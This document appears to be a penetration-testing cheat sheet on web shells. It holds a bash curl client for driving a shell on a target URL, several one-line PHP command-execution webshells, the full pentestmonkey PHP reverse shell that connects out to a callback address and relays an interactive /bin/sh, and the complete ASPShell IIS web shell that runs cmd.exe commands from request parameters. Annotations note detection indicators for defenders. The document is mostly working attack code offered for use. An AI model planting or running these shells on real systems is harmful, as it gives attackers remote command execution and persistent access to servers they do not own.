Web Shells

Simple bash script for interacting with a basic webshell

# Save the next one-liner as cli.sh
# Interactive client for the single-parameter webshells below: each line read
# at the prompt is appended verbatim to the URL prefix given as $1 and fetched
# with curl, whose response body (the command output) is printed to the terminal.
# $1 and $cmd are expanded unquoted and read has no -r, so shell word splitting,
# globbing and backslash handling apply to every command typed.
while true;do read -p "[>] :~$ " cmd;curl $1$cmd;done

# Usage: ./cli.sh http://target.com/path/to/shell.php?0=
# Defender note: every command travels in a GET query string, so the web
# server's access log retains the complete command history for this channel.

PHP - Basic

#Simple Webshell - system
# Each snippet below is a complete single-file PHP webshell: the "cmd" (or "0")
# query parameter is handed straight to a command-execution primitive and the
# command's output is returned in the HTTP response.
<?php echo system($_GET["cmd"]); ?>

#Simple Webshell - passthru
<?php echo passthru($_GET['cmd']); ?>

#Tiny Webshell
# The backtick operator is equivalent to shell_exec(), so no function name
# appears in the source; disabling shell_exec via disable_functions also
# disables the backtick form.
<?=`$_GET[0]`?>

# Defender notes: look for system/passthru/exec/shell_exec/backticks fed from
# $_GET/$_POST/$_REQUEST in web roots; at runtime, for the web server worker
# (php-fpm/httpd) spawning a shell while the command itself is visible in the
# access log's query string.

PHP - pentestmonkey php revshell

<?php
// pentestmonkey-style PHP reverse shell: the process running this script opens
// an outbound TCP connection to $ip:$port and relays an interactive /bin/sh
// over it. printit() reports status with print, i.e. into the script's normal
// output (the HTTP response when run under a web server).

set_time_limit (0);   // no max_execution_time, so the relay loop below is not killed
$VERSION = "1.0";
$ip = '127.0.0.1'; // CHANGE THIS <-----   callback address: a fixed network indicator in any deployed copy
$port = 1234; // CHANGE THIS <-----        callback port
$chunk_size = 1400;   // bytes per fread() from the socket or the shell's pipes
$write_a = null;      // write/except sets handed to stream_select(): nothing is polled for writability
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';   // recon commands first, then an interactive shell
$daemon = 0;
$debug = 0;

// Detach from the calling process when the pcntl extension is present:
// fork, let the parent exit, make the child a session leader.
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();

if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}

if ($pid) {
exit(0); // Parent exits
}

// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}

$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

chdir("/");   // leave the web root

umask(0);     // clear the file-mode creation mask for this process and the shell it spawns

// Outbound connect to the listener with a 30 s timeout. An outbound TCP
// connection originating from a web-tier process is the network-side signal
// for this; egress filtering on the web tier blocks it outright.
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}

$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);

// Spawn $shell as a child of this PHP process; the resulting process lineage
// (web server/PHP worker -> sh) is what host-based detection keys on.
$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}

// Non-blocking mode on all four streams so one select() loop can relay both directions.
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

// Relay loop: socket -> shell stdin, shell stdout/stderr -> socket,
// until either the socket or the shell's stdout reaches EOF.
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}

if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}

$read_a = array($sock, $pipes[1], $pipes[2]);
// Blocks with no timeout (null); the returned count is stored but never checked.
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}


if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}

if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}

// Teardown once the loop exits.
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Prints a status line followed by a newline unless running as a daemon.
// NOTE(review): $daemon is read here as a function-local variable — there is
// no `global $daemon;` declaration — so inside this function it is always
// unset/falsy and the message is printed regardless of the top-level flag.
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}

?>

ASP.NET

<%@ Language = "JScript" %>
<%
/*
ASPShell - web based shell for Microsoft IIS
Copyright (C) 2007 Kurt Hanner

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA

http://aspshell.sourceforge.net
*/
var version = "0.2 (beta) [2007-09-29]";
var homepagelink = "http://aspshell.sourceforge.net";

// Server side. Two request parameters drive everything: q is the command (or
// a ':'-prefixed meta-command) and cd is the working directory the browser UI
// last saw. Both are used below exactly as received, without validation.
// With q present the response is plain text; without it the console page
// (HTML further down) is rendered.
var q = Request("q")();
var cd = Request("cd")();
if (q)
{
var command = "";
var output = "";
// NOTE(review): q is already truthy here, so for a plain string this branch
// cannot run; presumably a guard for a non-string Request value.
if (q.length == 0)
{
q = ":";
}
command = "" + q;
if (command == "?")
{
output = " ? this help page\n" +
" :sv all server variables\n" +
" <shell command> execute any shell command\n";
}
// ":sv" dumps every Request.ServerVariables entry (environment disclosure).
else if (command.toLowerCase() == ":sv")
{
var sv = "";
var svvalue = "";
var esv = new Enumerator(Request.ServerVariables);
for (; !esv.atEnd(); esv.moveNext())
{
sv = esv.item();
output += sv;
output += ": ";
svvalue = "" + Request.ServerVariables(sv);
if (svvalue.indexOf("\n") >= 0)
{
output += "\n";
var svitems = svvalue.split("\n");
for (var i=0; i<svitems.length; i++)
{
if (svitems[i].length > 0)
{
output += " ";
output += svitems[i];
output += "\n";
}
}
}
else
{
output += svvalue;
output += "\n";
}
}
}
// ":cd" answers the server process's current directory.
else if (command.toLowerCase() == ":cd")
{
var fso = new ActiveXObject("Scripting.FileSystemObject");
output = fso.GetAbsolutePathName(".");
}
// ":checkdir <dir>" resolves <dir> against cd and answers the absolute path,
// or the literal "fail" when the folder does not exist. GetFolder(cd) is not
// guarded; an empty or invalid cd presumably raises an unhandled script error.
else if (/^:checkdir\s(.*)?$/i.test(command))
{
var newdirabs = "";
var newdir = RegExp.$1;
var fso = new ActiveXObject("Scripting.FileSystemObject");
var cdnorm = fso.GetFolder(cd).Path;   // computed but not used below
if (/^\\/i.test(newdir))
{
newdirabs = fso.GetFolder(cd).Drive + newdir;
}
else if (/^\w:/i.test(newdir))
{
newdirabs = fso.GetAbsolutePathName(newdir);
}
else
{
newdirabs = fso.GetAbsolutePathName(fso.GetFolder(cd).Path + "\\" + newdir);
}
output = fso.FolderExists(newdirabs) ? newdirabs : "fail";
}
// Anything else is run verbatim through cmd.exe, prefixed with a drive change
// and cd to the client-supplied directory. Both cd and command are
// concatenated into the command line as received.
else
{
var changedir = "";
var currdrive = "";
var currpath = "";
var colonpos = cd.indexOf(":");
if (colonpos >= 0) {
currdrive = cd.substr(0, colonpos+1);
currpath = cd.substr(colonpos+1);
changedir = currdrive + " && cd \"" + currpath + "\" && ";
}
// Defender note: WScript.Shell.Exec of "%comspec% /c" from an ASP page means
// cmd.exe spawned as a child of the IIS worker process; that lineage, plus
// the strings "WScript.Shell", ".Exec(" and "%comspec%" next to "Request("
// in a script under the web root, are the indicators for this family.
var shell = new ActiveXObject("WScript.Shell");
var pipe = shell.Exec("%comspec% /c \"" + changedir + command + "\"");
// NOTE(review): reading stdout to completion before touching stderr can
// block if the child fills the stderr pipe first — confirm on long-running commands.
output = pipe.StdOut.ReadAll() + pipe.StdErr.ReadAll();
}
Response.Write(output);
}
else
{
// No q: render the console UI. Only version/homepagelink are used by the
// HTML below; currentpath, currentdrive and drivepath are computed but unused.
var fso = new ActiveXObject("Scripting.FileSystemObject");
var currentpath = fso.GetAbsolutePathName(".");
var currentdrive = fso.GetDrive(fso.GetDriveName(currentpath));
var drivepath = currentdrive.Path;
%>
<!-- Console UI, sent only when the request carries no q parameter (server-side else branch above). -->
<html>

<head>
<meta HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<style><!--
body {
background: #000000;
color: #CCCCCC;
font-family: courier new;
font-size: 10pt
}
input {
background: #000000;
color: #CCCCCC;
border: none;
font-family: courier new;
font-size: 10pt;
}
--></style>

<script language="JavaScript"><!--

// Client-side console state shared by the handlers below.
var history = [];              // commands submitted so far, oldest first (Up/Down recall)
var historypos = 0;            // recall cursor; equal to history.length means "editing a new line"
var currentdirectory = "";     // cwd reported by the server; echoed in the prompt and sent as the cd parameter
var checkdirectory = "";       // last directory handed to :checkdir; assigned in KeyDownEventHandler, not read elsewhere on this page
// NOTE(review): `history` presumably shadows the browser's window.history for this page's scripts.

// Sends `vars` as a form-encoded POST body to `url` and hands a non-empty
// response body to `callbackFunction`. Any status other than 200, and any
// empty body, is dropped silently — the caller receives no error signal.
function ajax(url, vars, callbackFunction)
{
	var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("MSXML2.XMLHTTP.3.0");
	var onStateChange = function()
	{
		if (xhr.readyState != 4 || xhr.status != 200)
		{
			return;
		}
		if (xhr.responseText)
		{
			callbackFunction(xhr.responseText);
		}
	};
	xhr.open("POST", url, true);
	xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
	xhr.onreadystatechange = onStateChange;
	xhr.send(vars);
}

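// Converts raw command output into HTML that keeps its layout inside a DIV:
// HTML-significant characters are escaped, spaces become &nbsp;, tabs become
// eight &nbsp; and newlines become <br/>.
// '&' is escaped first so the entities introduced by the later steps are not
// re-escaped. The original skipped '&' entirely, so output containing e.g.
// "&lt;" was rendered by the browser as "<".
function FormatOutput(txt)
{
	return txt.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/\x20/g, "&nbsp;").replace(/\t/g, "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;").replace(/\n/g, "<br/>");
}
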
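// Keyboard handler installed on document.onkeydown by InitPage:
//   Enter (13)  submits the command box. A "cd <dir>" command is first
//               validated server-side via ":checkdir"; anything else is sent
//               to the server as-is.
//   Up (38) / Down (40) walk the command history.
// The input has name="q" and no id, so document.all("q") (name or id lookup)
// is used to reach it.
function KeyDownEventHandler(ev)
{
	var input = document.all("q");
	input.focus();
	if (!ev)
	{
		ev = window.event;
	}
	// Declared locally: the original left `keycode` as an implicit global, so an
	// event with neither `which` nor `keyCode` reused the previous keystroke's value.
	var keycode = 0;
	if (ev.which)
	{
		keycode = ev.which;
	}
	else if (ev.keyCode)
	{
		keycode = ev.keyCode;
	}
	if (keycode == 13)
	{
		var cmd = input.value;
		outputAvailable("[" + currentdirectory + "] " + cmd);
		// Capture the target directory with exec() rather than the RegExp.$n
		// statics, which any later regex evaluation would overwrite.
		var cdMatch = /cd\s+(\"?)(.*)?\1\s*$/i.exec(cmd);
		if (cdMatch)
		{
			checkdirectory = cdMatch[2] || "";
			ajax(document.URL, "q=" + encodeURIComponent(":checkdir " + checkdirectory) + "&cd=" + encodeURIComponent(currentdirectory), checkdirAvailable);
			rememberCommand(cmd);
		}
		else if (cmd.length > 0)
		{
			ajax(document.URL, "q=" + encodeURIComponent(cmd) + "&cd=" + encodeURIComponent(currentdirectory), outputAvailable);
			rememberCommand(cmd);
		}
	}
	else if (keycode == 38 && historypos > 0)
	{
		historypos--;
		input.value = history[historypos];
	}
	else if (keycode == 40 && historypos < history.length)
	{
		historypos++;
		// Stepping past the newest entry clears the box for a fresh command.
		input.value = (historypos == history.length) ? "" : history[historypos];
	}
}

// Appends a submitted command to the history and parks the recall cursor past it.
function rememberCommand(cmd)
{
	history[history.length] = cmd;
	historypos = history.length;
}
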
// Appends one escaped block of text to the #output DIV, scrolls the page to
// the bottom, and clears the command box.
function outputAvailable(output)
{
	var line = document.createElement("DIV");
	line.innerHTML = FormatOutput(output);
	document.all("output").appendChild(line);

	// IE exposes the scroll offset on document.body, other engines on window.
	var currentY = function()
	{
		return document.all ? document.body.scrollTop : window.pageYOffset;
	};
	// Page down 100px at a time until the offset stops changing (bottom reached).
	var before;
	var after;
	do
	{
		before = currentY();
		window.scrollBy(0, 100);
		after = currentY();
	} while (before < after);

	document.all("q").value = "";
}

// Callback for a ":checkdir" round-trip: the server answers either the
// resolved absolute path or the literal string "fail".
function checkdirAvailable(output)
{
	var failed = output.toLowerCase() == "fail";
	if (failed)
	{
		outputAvailable("The system cannot find the path specified.");
		return;
	}
	SetCurrentDirectory(output);
}

// Records the working directory reported by the server and shows it in the
// prompt label. `output` is written through innerHTML without escaping; it is
// produced by this page's own server side.
function SetCurrentDirectory(output)
{
	currentdirectory = output;
	var promptLabel = document.all("prompt");
	promptLabel.innerHTML = "[" + output + "]";
}

// Asks the server for its current directory (":cd" meta-command) and routes
// the answer to SetCurrentDirectory.
function GetCurrentDirectory()
{
	var query = "q=" + encodeURIComponent(":cd");
	ajax(document.URL, query, SetCurrentDirectory);
}

// body.onload: focus the command box, install the key handler, fetch the cwd.
function InitPage()
{
	var input = document.all("q");
	input.focus();
	document.onkeydown = KeyDownEventHandler;
	GetCurrentDirectory();
}
//--></script>

<title id=titletext>Web Shell</title>
</head>

<body onload="InitPage()">

<div id="output">
<div id="greeting">
ASPShell - Web-based Shell Environment Version <%=version%><br/>
Copyright (c) 2007 Kurt Hanner, <a href="<%=homepagelink%>"><%=homepagelink%></a><br/><br/>
</div>
</div>

<!-- The input has name="q" and no id; the scripts above reach it with document.all("q"), which matches by name. -->
<label id="prompt">[undefined]</label>
<input type="text" name="q" maxlength=1024 size=72>

</body>
</html>
<%
}
%>